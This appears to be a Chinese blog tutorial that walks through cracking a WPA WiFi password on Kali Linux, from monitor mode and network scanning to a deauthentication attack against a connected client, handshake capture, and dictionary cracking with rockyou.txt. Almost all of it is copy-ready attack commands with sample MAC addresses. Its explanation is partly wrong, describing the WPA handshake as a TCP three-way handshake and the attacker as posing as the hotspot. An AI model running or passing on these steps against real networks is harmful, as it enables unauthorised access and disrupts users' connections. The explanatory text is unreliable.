安装kali:
这里就不介绍如何安装kali了,跟着网上教程安装就行
这里推荐推荐:
https://blog.csdn.net/weixin_41247970/article/details/104118700
使用工具:
这是我使用的网卡:RT3070
开始主题:
- 切换到root模式:
su root
看见root后面的骷髅头没(请合理使用技术)
这里说一下输入密码是看不见的(就是不显示密码)
- 查看无线网卡:
airmon-ng
可以看到显示wlan0 ,这就是我的网卡
- 开启网卡的监听模式
airmon-ng start wlan0
- 其他网卡处于监听状态,需要先将其关闭
airmon-ng check kill
- 再次查看网卡:
airmon-ng
会发现waln0变成wlan0mon
- 扫描附近的wifi信号:
airodump-ng wlan0mon
BSSID为wifi的MAC地址,PWR为信号强弱程度,数值越小信号越强;#DATA为数据量,越大使用的人就越多,CH为信道频率(频道),ESSID为wifi的名称,中文可能会有乱码
我将破解名称为shujin(这个是我自己的WiFi)的这个wifi,也就是第一个wifi
Ctrl+c(停止)
- 抓取wifi数据包并保存:
airodump-ng -c 1 --bssid 36:13:E8:74:F8:83 -w ~/wifi/test wlan0mon
- 攻击获取WPA hankshake:
aireplay-ng -<攻击模式,这里使用持续攻击(0)> [攻击次数,0为无限攻击] -a <AP端的MAC地址> -c <被攻击设备的MAC地址> <interface名称>
aireplay-ng -0 10 -a 36:13:E8:74:F8:83 -c 10:32:7E:01:67:F8 wlan0mon
攻击原理是:先让设备掉线,设备会再自动连接,并发这个自动连接过程会进行三次握手,会发送tcp包,我方伪装成WiFi热点去窃取该数据包。我方窃取后即可用字典穷举法暴力破解加密的WiFi密码,数据包里面的密码是哈希加密的,哈希加密只能正向
- 查看被攻击的用户是否重新连接wifi:
airodump-ng -c 1 --bssid 36:13:E8:74:F8:83 -w ~/wifi/test wlan0mon
会出现**WPA handshake:**表示成功
- 使用字典破解:
kali有自带的字典需要解压(rockyou.txt.gz)
- 输入命令:
注意查看上面保存的地址
aircrack-ng -w /usr/share/wordlists/rockyou.txt ~/wifi/test-06.cap
- 答案
结束:
这个不是万能的,你必须有强大的字典,强密码就很难破解(有一些还破解不了,得使用其他技术)